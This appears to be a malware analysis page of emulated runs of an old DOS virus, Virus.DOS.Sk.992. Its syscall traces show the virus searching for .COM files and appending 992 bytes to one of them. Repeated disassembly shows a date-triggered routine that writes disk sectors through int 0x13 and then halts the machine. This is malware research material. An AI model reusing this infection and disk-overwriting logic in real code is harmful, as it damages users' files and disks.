Sample viewer

vx.netlux.org/Virus.DOS.Sk.992

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:41:58.848506423Z	98	PC: 12d20 \| Get current PSP
2018-12-17T22:41:58.851750094Z	25	PC: 12dea \| Get default drive
2018-12-17T22:41:58.852802955Z	25	PC: 9f5c6 \| Get default drive
2018-12-17T22:41:58.854768892Z	42	PC: 9f628 \| Get date 0x9f628: cmp dl, 0x15 0x9f62b: jne 0x9f63e 0x9f62d: mov ax, 0x309 0x9f630: mov dx, 0 0x9f633: mov cx, 1 0x9f636: lea bx, word ptr [0x100] 0x9f63a: int 0x13 0x9f63c: jmp 0x9f64f 0x9f63e: mov ax, 0 0x9f641: mov ds, ax 0x9f643: inc word ptr [0x310] 0x9f647: cmp word ptr [0x310], 0x2ff 0x9f64d: jne 0x9f65d 0x9f64f: push cs 0x9f650: pop ds 0x9f651: mov ah, 9 0x9f653: mov dx, 0x37f 0x9f656: int 0x21 0x9f658: cli 0x9f659: hlt
2018-12-17T22:41:58.857635358Z	47	PC: 9f663 \| Get disk transfer address
2018-12-17T22:41:58.859356225Z	26	PC: 9f672 \| Set disk transfer address
2018-12-17T22:41:58.860978943Z	78	PC: 9f67e \| Find first file
2018-12-17T22:41:58.867129464Z	61	PC: 9f68d \| Open file (Filename = 's�~��>?!�u�?!')
2018-12-17T22:41:58.874027449Z	63	PC: 9f6af \| Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:41:58.880784021Z	62	PC: 9f6d7 \| Close file
2018-12-17T22:41:58.882699468Z	79	PC: 9f6dd \| Find next file
2018-12-17T22:41:58.886731221Z	61	PC: 9f68d \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:41:58.893631719Z	63	PC: 9f6af \| Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:41:58.900432342Z	62	PC: 9f6d7 \| Close file
2018-12-17T22:41:58.903284771Z	79	PC: 9f6dd \| Find next file
2018-12-17T22:41:58.906203271Z	61	PC: 9f68d \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:41:58.913085294Z	63	PC: 9f6af \| Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:41:58.919973638Z	62	PC: 9f6d7 \| Close file
2018-12-17T22:41:58.921729449Z	79	PC: 9f6dd \| Find next file
2018-12-17T22:41:58.924314972Z	61	PC: 9f68d \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:41:58.931277557Z	63	PC: 9f6af \| Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:41:58.937786155Z	62	PC: 9f6d7 \| Close file
2018-12-17T22:41:58.939743929Z	79	PC: 9f6dd \| Find next file
2018-12-17T22:41:58.94349354Z	61	PC: 9f68d \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:41:58.950095434Z	63	PC: 9f6af \| Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:41:58.95669227Z	62	PC: 9f6d7 \| Close file
2018-12-17T22:41:58.95870606Z	79	PC: 9f6dd \| Find next file
2018-12-17T22:41:58.961300868Z	61	PC: 9f68d \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:41:58.967521986Z	63	PC: 9f6af \| Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:41:58.973921163Z	66	PC: 9f71d \| Move file pointer
2018-12-17T22:41:58.975559052Z	64	PC: 9f72b \| Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:41:58.978806794Z	66	PC: 9f734 \| Move file pointer
2018-12-17T22:41:58.980325609Z	64	PC: 9f744 \| Write file or device (Write 992 bytes on handle 5)
2018-12-17T22:41:59.263459534Z	62	PC: 9f74c \| Close file
2018-12-17T22:41:59.269129992Z	26	PC: 9f763 \| Set disk transfer address
2018-12-17T22:41:59.270110163Z	255	PC: 12e03 \| UNKNOWN!
2018-12-17T22:41:59.274954606Z	0	PC: 12a47 \| Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7393,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:01:27.338766781Z	98	PC: 12d20 \| Get current PSP
2018-12-25T12:01:27.340549053Z	25	PC: 12dea \| Get default drive
2018-12-25T12:01:27.34268903Z	25	PC: 9f5c6 \| Get default drive
2018-12-25T12:01:27.34547245Z	42	PC: 9f628 \| Get date 0x9f628: cmp dl, 0x15 0x9f62b: jne 0x9f63e 0x9f62d: mov ax, 0x309 0x9f630: mov dx, 0 0x9f633: mov cx, 1 0x9f636: lea bx, word ptr [0x100] 0x9f63a: int 0x13 0x9f63c: jmp 0x9f64f 0x9f63e: mov ax, 0 0x9f641: mov ds, ax 0x9f643: inc word ptr [0x310] 0x9f647: cmp word ptr [0x310], 0x2ff 0x9f64d: jne 0x9f65d 0x9f64f: push cs 0x9f650: pop ds 0x9f651: mov ah, 9 0x9f653: mov dx, 0x37f 0x9f656: int 0x21 0x9f658: cli 0x9f659: hlt
2018-12-25T12:01:27.348400035Z	47	PC: 9f663 \| Get disk transfer address
2018-12-25T12:01:27.352816824Z	26	PC: 9f672 \| Set disk transfer address
2018-12-25T12:01:27.354674347Z	78	PC: 9f67e \| Find first file
2018-12-25T12:01:27.362033569Z	61	PC: 9f68d \| Open file (Filename = 's�~��>?!�u�?!')
2018-12-25T12:01:27.37105685Z	63	PC: 9f6af \| Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:01:27.380350625Z	62	PC: 9f6d7 \| Close file
2018-12-25T12:01:27.382295235Z	79	PC: 9f6dd \| Find next file
2018-12-25T12:01:27.386335881Z	61	PC: 9f68d \| Open file (See above)
2018-12-25T12:01:27.39434843Z	63	PC: 9f6af \| Read file or device (See above)
2018-12-25T12:01:27.402153775Z	62	PC: 9f6d7 \| Close file (See above)
2018-12-25T12:01:27.404496915Z	79	PC: 9f6dd \| Find next file (See above)
2018-12-25T12:01:27.408095755Z	61	PC: 9f68d \| Open file (See above)
2018-12-25T12:01:27.415776302Z	63	PC: 9f6af \| Read file or device (See above)
2018-12-25T12:01:27.423618536Z	62	PC: 9f6d7 \| Close file (See above)
2018-12-25T12:01:27.427014238Z	79	PC: 9f6dd \| Find next file (See above)
2018-12-25T12:01:27.430619832Z	61	PC: 9f68d \| Open file (See above)
2018-12-25T12:01:27.438539617Z	63	PC: 9f6af \| Read file or device (See above)
2018-12-25T12:01:27.44668376Z	62	PC: 9f6d7 \| Close file (See above)
2018-12-25T12:01:27.44919196Z	79	PC: 9f6dd \| Find next file (See above)
2018-12-25T12:01:27.452746453Z	61	PC: 9f68d \| Open file (See above)
2018-12-25T12:01:27.464957137Z	63	PC: 9f6af \| Read file or device (See above)
2018-12-25T12:01:27.473843349Z	62	PC: 9f6d7 \| Close file (See above)
2018-12-25T12:01:27.476421152Z	79	PC: 9f6dd \| Find next file (See above)
2018-12-25T12:01:27.480578789Z	61	PC: 9f68d \| Open file (See above)
2018-12-25T12:01:27.488527327Z	63	PC: 9f6af \| Read file or device (See above)
2018-12-25T12:01:27.496210481Z	66	PC: 9f71d \| Move file pointer
2018-12-25T12:01:27.498265941Z	64	PC: 9f72b \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:01:27.502584939Z	66	PC: 9f734 \| Move file pointer
2018-12-25T12:01:27.504651899Z	64	PC: 9f744 \| Write file or device (Write 992 bytes on handle 5)
2018-12-25T12:01:27.909923432Z	62	PC: 9f74c \| Close file
2018-12-25T12:01:27.920358657Z	26	PC: 9f763 \| Set disk transfer address
2018-12-25T12:01:27.922016584Z	255	PC: 12e03 \| UNKNOWN!
2018-12-25T12:01:27.932579897Z	0	PC: 12a47 \| Program terminate

{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7393,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:01:28.949855097Z	98	PC: 12d20 \| Get current PSP
2018-12-25T12:01:28.951132476Z	25	PC: 12dea \| Get default drive
2018-12-25T12:01:28.953206677Z	25	PC: 9f5c6 \| Get default drive
2018-12-25T12:01:28.958350236Z	42	PC: 9f628 \| Get date 0x9f628: cmp dl, 0x15 0x9f62b: jne 0x9f63e 0x9f62d: mov ax, 0x309 0x9f630: mov dx, 0 0x9f633: mov cx, 1 0x9f636: lea bx, word ptr [0x100] 0x9f63a: int 0x13 0x9f63c: jmp 0x9f64f 0x9f63e: mov ax, 0 0x9f641: mov ds, ax 0x9f643: inc word ptr [0x310] 0x9f647: cmp word ptr [0x310], 0x2ff 0x9f64d: jne 0x9f65d 0x9f64f: push cs 0x9f650: pop ds 0x9f651: mov ah, 9 0x9f653: mov dx, 0x37f 0x9f656: int 0x21 0x9f658: cli 0x9f659: hlt
2018-12-25T12:01:28.9734021Z	9	PC: 9f658 \| Display string (String= 'Virus in memory !!! Created by 21.I.1990 - PMG\OTME - Tolbuhin ...')